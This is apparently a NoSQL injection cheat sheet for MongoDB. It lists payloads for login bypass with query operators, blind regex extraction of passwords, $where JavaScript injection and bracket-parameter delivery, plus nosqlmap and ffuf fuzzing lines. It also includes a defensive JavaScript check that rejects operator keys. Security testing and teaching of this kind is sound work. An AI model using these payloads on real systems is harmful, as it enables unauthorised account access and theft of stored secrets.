
NoSQL Injection

NoSQL injection (MongoDB-focused) — authentication bypass with operators, query operator injection, blind regex extraction, server-side $where JavaScript injection, JSON vs form delivery, and NoSQLMap/ffuf tooling.

Jun 2026, lazyhackers
Authentication Bypass (5)

{"username":"admin","password":{"$ne":null}}
  Operator injection: "not equal to null" matches any password
  tags: authbypass, mongo

{"username":{"$ne":null},"password":{"$ne":null}}
  Logs in as the first user returned when both fields are bypassed
  tags: authbypass, mongo

{"username":"admin","password":{"$gt":""}}
  "Greater than empty string" matches any non-empty password
  tags: authbypass, mongo

username=admin&password[$ne]=x
  The same operator injection delivered as form/URL-encoded bracket parameters
  tags: authbypass, form

{"username":{"$regex":"^adm"},"password":{"$ne":1}}
  Regex-match the username, bypass the password
  tags: authbypass, regex
Query Operator Injection (5)

{"$ne":null}
  Match anything that is not null
  tags: operator

{"$gt":""} / {"$lt":"~"}
  Range operators that match any populated string field
  tags: operator

{"$in":["admin","root"]}
  Match any value from a list
  tags: operator

{"$exists":true}
  Filter on field presence
  tags: operator

{"$regex":".*"}
  Wildcard regex match
  tags: operator, regex
Blind Extraction (Regex Oracle) (3)

password[$regex]=^a.*
  Confirm the first character, then iterate the alphabet
  tags: blind, regex, extract

username=admin&password[$regex]=^p.*
  Character-by-character extraction of a secret field
  tags: blind, extract

true vs false response = an oracle for each guessed char
  A distinguishable true/false response is the boolean oracle that drives blind NoSQLi
  tags: blind, boolean
JavaScript Injection ($where) (4)

{"$where":"this.password.match(/.*/)"}
  Run server-side JavaScript inside the query
  tags: jsinjection, where

{"$where":"sleep(5000)"}
  Time-based blind via $where
  tags: jsinjection, time

'; return true; var x='
  Break out of a string into the $where JS context
  tags: jsinjection, breakout

{"$where":"function(){return this.role=='admin'}"}
  Arbitrary JS predicate
  tags: jsinjection
Encoding & Delivery (3)

Content-Type: application/json with operator objects
  Send real operator objects (not strings) in a JSON body
  tags: delivery, json

param[$ne]=1 (x-www-form-urlencoded)
  Express (extended/qs parsing) and PHP turn bracket parameters into nested objects, so the operator key reaches the query
  tags: delivery, form

?filter[$gt]=0
  Operator injection through query-string bracket notation
  tags: delivery, query
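An added example (not from the cheatsheet) of the server-side check that defeats both the JSON and the bracket-notation deliveries above: it assumes an Express-style login body and uses a hypothetical one-level bracket parser standing in for qs/PHP behaviour; nothing is sent to a database.

```javascript
// Mimics how Express's extended (qs) body parser and PHP expand
// "password[$ne]=x" into {password: {"$ne": "x"}}; one nesting level
// only, which is enough for the payloads on this page (hypothetical helper).
function parseBracketForm(body) {
  const out = {};
  for (const [key, value] of new URLSearchParams(body)) {
    const m = /^([^\[\]]+)\[([^\[\]]*)\]$/.exec(key);
    if (!m) {
      out[key] = value;
      continue;
    }
    const existing = out[m[1]];
    out[m[1]] = existing && typeof existing === "object" ? existing : {};
    out[m[1]][m[2]] = value;
  }
  return out;
}

// True if any key at any depth looks like a Mongo operator ($-prefixed)
// or a dotted path. String *values* containing "$" are not a concern.
function containsOperatorKey(value) {
  if (Array.isArray(value)) return value.some(containsOperatorKey);
  if (value !== null && typeof value === "object") {
    return Object.keys(value).some(
      (k) => k.startsWith("$") || k.includes(".") || containsOperatorKey(value[k])
    );
  }
  return false;
}

// Builds the login filter only from primitive strings. Anything else is
// refused with a reason the caller can log and alert on.
function buildLoginFilter(body) {
  if (containsOperatorKey(body)) {
    return { ok: false, reason: "operator key in input" };
  }
  const { username, password } = body;
  if (typeof username !== "string" || typeof password !== "string") {
    return { ok: false, reason: "non-string credential field" };
  }
  return { ok: true, filter: { username, password } };
}

// Constructed sample inputs: the JSON and form-encoded payloads from above.
console.log(buildLoginFilter({ username: "admin", password: { $ne: null } }));
console.log(buildLoginFilter(parseBracketForm("username=admin&password[$ne]=x")));
console.log(buildLoginFilter({ username: "admin", password: "hunter2" }));
```

A password that merely contains "$" as a string still passes, since the check is on object keys, not on string contents.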
Tooling (3)

nosqlmap
  Automated MongoDB / NoSQL injection and enumeration
  tags: tooling, nosqlmap

ffuf -w operators.txt -u 'https://target.com/api?id[FUZZ]=1'
  Fuzz operator names into bracket parameters
  tags: tooling, ffuf

Burp: convert JSON string values into operator objects
  Manual operator injection in Repeater
  tags: tooling, burp